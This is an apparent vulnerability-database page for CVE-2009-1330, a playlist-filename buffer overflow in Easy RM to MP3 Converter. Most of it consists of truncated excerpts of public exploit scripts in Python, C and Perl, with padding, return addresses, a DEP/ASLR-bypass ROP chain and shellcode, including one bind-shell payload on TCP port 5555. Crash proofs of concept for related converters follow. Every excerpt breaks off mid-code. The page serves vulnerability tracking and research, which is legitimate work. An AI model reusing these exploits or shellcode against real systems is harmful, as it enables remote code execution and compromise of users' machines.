CVE-2009-1330
published 2009-04-17CVE-2009-1330: Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
21.66%
97.3th percentile
Stack-based buffer overflow in Easy RM to MP3 Converter allows remote attackers to execute arbitrary code via a long filename in a playlist (.pls) file.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
exploitdb·2016-06-13·CVSS 9.3
CVE-2009-1330 [CRITICAL] Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
---
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # R
Exploit-DB
Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow
exploitdb·2010-08-04
CVE-2009-1330 Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow
Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow
---
# Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Date: 4 / 8 / 2010
# Author: Oh Yaw Theng
# Version: 2.7.3.700
# Tested on: Windows XP SP 1
# CVE : N / A
#!/usr/bin/python
# This exploit works for all the file extensions mention above
# User just need to change the file extension below with the extention mention above
filename = "crash.m3u"
# 35032 bytes are needed before overwriting EIP register
junk = "\x41" * 35032
# JMP ESP in SHELL32.DLL
ret = "\x40\x45\x3D\x77" # 77 3D 45 40 FFE4 JMP ESP
# Bind a shell at TCP Port 5555 (Telnet to this port after exploiting target)
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\
Exploit-DB
Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow
exploitdb·2009-12-23
CVE-2009-1330 Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow
Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow
---
// Exploit Title: Easy RM to MP3 27.3.700 local Buffer OverFlow Exploit on xp sp2
// Date: 24/12/2009
// Author: bibi-info
// Software Link: http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
// Version: 27.3.700
// Tested on: Windows Xp sp2
// greetz : His0k4 & All friends & muslims HaCkers(dz) (18/11/2009 )
#include
#include
#include
/* win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
Exploit-DB
Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow
exploitdb·2009-12-22
CVE-2009-1330 Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow
Easy RM to MP3 27.3.700 (Windows XP SP3) - Local Overflow
---
#
# Exploit for Easy RM to MP3 27.3.700 on Windows Xp sp3
# By d3b4g
# tested on Windows XP SP3
# version:27.3.700
# Date:22.12.09
# From tiny islands of maldivies
#
my $file= "d3b4g.m3u";
my $junk= "A" x 26071;
my $eip = pack('V',0x7C836A08); #jmp esp from kernel32.dll
my $shellcode = "\x90" x 30;
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xf
Exploit-DB
Easy RM to MP3 Converter - Universal Stack Overflow
exploitdb·2009-04-14
CVE-2009-1330 Easy RM to MP3 Converter - Universal Stack Overflow
Easy RM to MP3 Converter - Universal Stack Overflow
---
#!/usr/bin/python
# Easy RM to MP3 Converter Universall Stack Overflow Exploit
# By Stack
# hihihi
# StaKer : Only Fabri Fibra :d
header = (
"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D"
"\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45"
"\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46"
"\x69\x6C\x65\x31\x3D")
junk = "\x41"*1244
eip = "\xDB\x70\xBB\x01" # Universall Adress
# Abouts addres
# Executable modules, item 5
# Base=01A20000
# Size=0049D000 (4837376.)
# Entry=01B835B1 MSRMCu_3.
# Name=MSRMCu_3
# Path=C:\Program Files\Easy RM to MP3 Converter\MSRMCutility04.dll
nops = "\x90" * 20
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 WM Downloader - '.m3u' Local Stack Overflow (PoC)
WM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 RM Downloader - '.m3u' Local Stack Overflow (PoC)
RM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34514https://exchange.xforce.ibmcloud.com/vulnerabilities/50326https://www.exploit-db.com/exploits/39933/https://www.exploit-db.com/exploits/8427http://www.securityfocus.com/bid/34514https://exchange.xforce.ibmcloud.com/vulnerabilities/50326https://www.exploit-db.com/exploits/39933/https://www.exploit-db.com/exploits/8427
2009-04-17
Published